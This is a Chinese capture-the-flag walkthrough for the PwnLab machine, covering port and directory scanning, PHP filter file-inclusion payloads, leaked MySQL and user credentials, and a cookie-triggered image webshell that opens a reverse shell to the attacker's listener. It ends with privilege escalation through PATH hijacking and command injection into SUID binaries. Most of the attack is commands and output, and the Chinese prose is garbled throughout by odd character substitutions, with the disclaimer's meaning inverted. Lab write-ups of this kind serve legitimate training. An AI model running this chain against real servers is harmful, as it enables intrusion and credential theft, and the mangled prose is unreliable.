共计 13469 个字符,预计需要花费 34 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责
服务探测
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -p- 192.168.151.29 --open
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:50 EST
Nmap scan report for 192.168.151.29
Host is up (0.22s latency).
Not shown: 65257 closed ports, 274 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
53955/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 94.55 seconds
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sV -T5 -A -O 192.168.151.29 -p 80,111,3306,53955
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 07:52 EST
Nmap scan report for 192.168.151.29
Host is up (0.23s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 38
| Capabilities flags: 63487
| Some Capabilities: DontAllowDatabaseTableColumn, ODBCClient, Speaks41ProtocolNew, LongPassword, FoundRows, SupportsTransactions, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, Support41Auth, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: mT<l1J`%6|5-#fZn=&BZ
|_ Auth Plugin Name: mysql_native_password
53955/tcp open status 1 (RPC #100024)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.12 (94%), Linux 4.4 (94%), Linux 4.9 (94%), Linux 3.10 (91%), Linux 3.10 - 4.11 (90%), Linux 3.11 - 4.1 (90%), Linux 3.2 - 4.9 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 227.38 ms 192.168.49.1
2 227.59 ms 192.168.151.29
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.73 seconds
web
┌──(root💀kali)-[~/pg/PwnLab]
└─# python3 /root/dirsearch/dirsearch.py -e* -u http://192.168.151.29 -t 30
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15492
Output File: /root/dirsearch/reports/192.168.151.29/_22-01-17_07-55-55.txt
Error Log: /root/dirsearch/logs/errors-22-01-17_07-55-55.log
Target: http://192.168.151.29/
[07:55:55] Starting:
[07:57:33] 200 - 0B - /config.php
[07:57:59] 200 - 943B - /images/
[07:57:59] 301 - 317B - /images -> http://192.168.151.29/images/
[07:58:02] 200 - 332B - /index.php/login/
[07:58:02] 200 - 332B - /index.php
[07:58:09] 200 - 250B - /login.php
[07:58:59] 301 - 317B - /upload -> http://192.168.151.29/upload/
[07:59:00] 200 - 19B - /upload.php
[07:59:00] 200 - 743B - /upload/ 跑出 4 个 php 文件,config.php,index.php,upload.php,login.php
两个文件夹 images 和 upload
rpc
┌──(root💀kali)-[~/pg/PwnLab]
└─# rpcinfo 192.168.151.29 1 ⨯
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.137.210 status 106
100024 1 tcp 0.0.0.0.210.195 status 106
100024 1 udp6 ::.184.57 status 106
100024 1 tcp6 ::.170.192 status 106
┌──(root💀kali)-[~/pg/PwnLab]
└─# nmap -sSUC -p 111 192.168.151.29 130 ⨯
Starting Nmap 7.91 (https://nmap.org) at 2022-01-17 08:05 EST
Nmap scan report for 192.168.151.29
Host is up (0.33s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
111/udp open|filtered rpcbind
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 35282/udp status
| 100024 1 43712/tcp6 status
| 100024 1 47161/udp6 status
|_ 100024 1 53955/tcp status
Nmap done: 1 IP address (1 host up) scanned in 26.38 seconds
没什么特地有用的信息。
LFI
首页 url 格局是:
http://192.168.151.29/?page=page 前面当初只有两个参数 login 和 uoload
应用 php 伪协定触发文件蕴含破绽。
上面 playload 读取 login 源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=login页面打印
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==base64 decode
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);
if (isset($_POST['user']) and isset($_POST['pass']))
{$luser = $_POST['user'];
$lpass = base64_encode($_POST['pass']);
$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);
$stmt->execute();
$stmt->store_Result();
if ($stmt->num_rows == 1)
{$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{echo "Login failed.";}
}
else
{
?>
<form action=""method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}
应用上面 playload 读取 upload 源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=upload<?php
session_start();
if (!isset($_SESSION['user'])) {die('You must be log in.'); }
?>
<html>
<body>
<form action=''method='post'enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {if ($_FILES['file']['error'] <= 0) {$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");
if (!(in_array($file_ext, $whitelist))) {die('Not allowed extension, please upload images only.');
}
if(strpos($filetype,'image') === false) {die('Error 001');
}
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {die('Error 002');
}
if(substr_count($filetype, '/')>1){die('Error 003');
}
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {echo "<img src=\"".$uploadfile."\"><br />";} else {die('Error 4');
}
}
}
?>应用上面 playload 读取 config 源码
http://192.168.151.29/?page=php://filter/convert.base64-encode/resource=config<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>当初咱们晓得了 mysql 的账号密码,因为靶机开启了外放的 mysql 服务,咱们能够从攻击机间接连贯靶机 mysql。
mysql
没有进入 users 数据库的权限
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.243 sec)
MySQL [(none)]> use users;
ERROR 1044 (42000): Access denied for user 'root'@'%' to database 'users'
然而有查问 users 数据库的权限
MySQL [information_schema]> show grants;
+------------------------------------------------------------------+
| Grants for root@% |
+------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD <secret> |
| GRANT SELECT ON `Users`.* TO 'root'@'%' |
+------------------------------------------------------------------+
2 rows in set (0.228 sec)
查问表名和表数据
MySQL [information_schema]> select * from tables where table_schema = 'Users';
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| TABLE_CATALOG | TABLE_SCHEMA | TABLE_NAME | TABLE_TYPE | ENGINE | VERSION | ROW_FORMAT | TABLE_ROWS | AVG_ROW_LENGTH | DATA_LENGTH | MAX_DATA_LENGTH | INDEX_LENGTH | DATA_FREE | AUTO_INCREMENT | CREATE_TIME | UPDATE_TIME | CHECK_TIME | TABLE_COLLATION | CHECKSUM | CREATE_OPTIONS | TABLE_COMMENT |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
| def | Users | users | BASE TABLE | InnoDB | 10 | Compact | 3 | 5461 | 16384 | 0 | 0 | 10485760 | NULL | 2016-03-17 10:17:53 | NULL | NULL | latin1_swedish_ci | NULL | | |
+---------------+--------------+------------+------------+--------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+-------------------+----------+----------------+---------------+
1 row in set (1.383 sec)
MySQL [information_schema]> select * from Users.users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.251 sec)
失去三组用户凭据:
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRo下面登录当前来到上传页面,各种绕过上传失败。。。
下面同样办法查看 index.php 文件
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[<a href="/">Home</a>] [<a href="?page=login">Login</a>] [<a href="?page=upload">Upload</a>]
<hr/><br/>
<?php
if (isset($_GET['page']))
{include($_GET['page'].".php");
}
else
{echo "Use this server to upload and share image files inside the intranet";}
?>
</center>
</body>
</html>注意这行代码, 蕴含了一个内部用户能够管制的 cookie 值,如果这个值变成咱们的图片马就会触发文件解析破绽
include("lang/".$_COOKIE['lang']);当时把一张图片上传,用 burpsuite 截断,把 rever_shell.php 代码藏在图片数据里,失去一张图片马:ae3c0cf901daed40d3382c6c67c15a63.jpg
应用 curl 触发蕴含 cookie,触发文件解析破绽
┌──(root💀kali)-[~/pg/PwnLab]
└─# curl -v --cookie "lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg" http://192.168.151.29/index.php
* Trying 192.168.151.29:80...
* Connected to 192.168.151.29 (192.168.151.29) port 80 (#0)
> GET /index.php HTTP/1.1
> Host: 192.168.151.29
> User-Agent: curl/7.74.0
> Accept: */*
> Cookie: lang=../upload/ae3c0cf901daed40d3382c6c67c15a63.jpg
>
收到反弹 shell
└─# nc -lnvp 4242 130 ⨯
listening on [any] 4242 ...
connect to [192.168.49.151] from (UNKNOWN) [192.168.151.29] 38751
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
11:03:44 up 3:17, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
提权
咱们下面拿到的用户凭据
kent:JWzXuBJJNy
mike:SIfdsTEn6I
kane:iSv5Ym2GRokent 和 kane 能够通过下面的明码自在切换 bash
在 kane 拿到 local.txt
kane 的家目录下还有个 SUID:msgmike,属主是 mike
用 strings 命令查看
kane@pwnlab:~$ strings msgmike
strings msgmike
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setregid
setreuid
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
QVh[[^_]
cat /home/mike/msg.txt
执行了一条cat /home/mike/msg.txt
能够通过劫持 cat 命令提权
把 /home/kane 写入 $PATH
export PATH=/home/kane:$PATH创立一个 cat 文件,并且给予执行权限
touch /home/kane/cat
chmod +x /home/kane/cat把上面的 shell 写进 /home/kane/cat
#!/bin/bash
bash -p执行 /home/kane/cat 命令,提权到 mike
kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$whoami
whoami
mike
在 mike 的 home 目录里, 有一个 msg2root 文件,也是一个 SUID,属主是 root,持续用 strings 命令查看
mike@pwnlab:/home/mike$ strings msg2root
strings msg2root
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
stdin
fgets
asprintf
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
Message for root:
/bin/echo %s >> /root/messages.txt
执行了一条 /bin/echo %s >> /root/messages.txt 命令
%s 是咱们输出的内容,因而同样能够劫持这条命令
Message for root: id & bash -p
id & bash -p
bash-4.3# id
bash-4.3# whoami
whoami
root
拿到 proof.txt
bash-4.3# more proof.txt
more proof.txt
8ae5471d5970a5...
总结
上传的利用原理解释如下:
首先 Apache 的版本号是:2.4.10,apache 的 2.4.0~2.4.29 存在一个解析破绽,见这里
此靶机的破绽利用就是应用了 Apache HTTPD 多后缀解析破绽
什么是多后缀解析破绽?
如果一个文件里有 php 代码,那么只有拜访的 url 里蕴含了 .php 后缀,那么这个文件都会被当成 php 文件解析,比方 test.php.jpg
查看这台靶机的源代码,留神这行:
$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;这里指定了上传后的文件名是源文件名的 md5 格局,后缀是白名单里容许的扩展名,所以失常状况咱们无奈绕过上传限度。
然而因为 index.php 里呈现的这一行代码
include("lang/".$_COOKIE['lang']);这个 lang 值咱们是能够管制的(应用 curl 指定 cookie 值),当初只须要把 lang 值换成咱们的图片马,那蕴含的图片马因为在一个 php 文件外面,所以就触发了 apache 的文件解析破绽,被当成了 php 代码执行。
概念代码如下
<?php
include('evil.jpg');
?>
正文完
